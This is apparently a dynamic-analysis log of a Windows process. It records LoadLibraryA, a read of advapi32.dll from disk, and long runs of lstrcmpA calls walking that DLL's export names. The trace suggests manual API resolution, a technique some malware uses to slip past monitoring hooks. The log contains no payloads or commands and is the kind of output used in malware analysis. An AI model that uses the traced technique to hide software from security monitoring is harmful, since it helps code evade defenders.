lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0089.869] GetProcessHeap () returned 0x5b0000 [0089.869] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x40e0040 | out: hHeap=0x5b0000) returned 1 [0089.880] GetProcessHeap () returned 0x5b0000 [0089.880] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c9300 [0090.067] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0090.067] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0090.067] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0090.067] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0090.068] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0090.068] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0090.068] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0090.068] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0090.068] GetProcessHeap () returned 0x5b0000 [0090.068] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa3ef0) returned 0x2d22010 [0090.070] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0090.070] ReadFile (in: hFile=0x140, lpBuffer=0x2d22010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d22010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0090.078] CloseHandle (hObject=0x140) returned 1 [0090.078] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0090.078] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0090.078] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0090.078] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0090.078] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0090.078] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0090.078] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0090.079] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0090.079] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0090.079] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.079] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0090.080] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.080] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.081] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0090.082] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0090.083] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0090.084] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0090.084] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0090.084] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.085] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0090.086] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 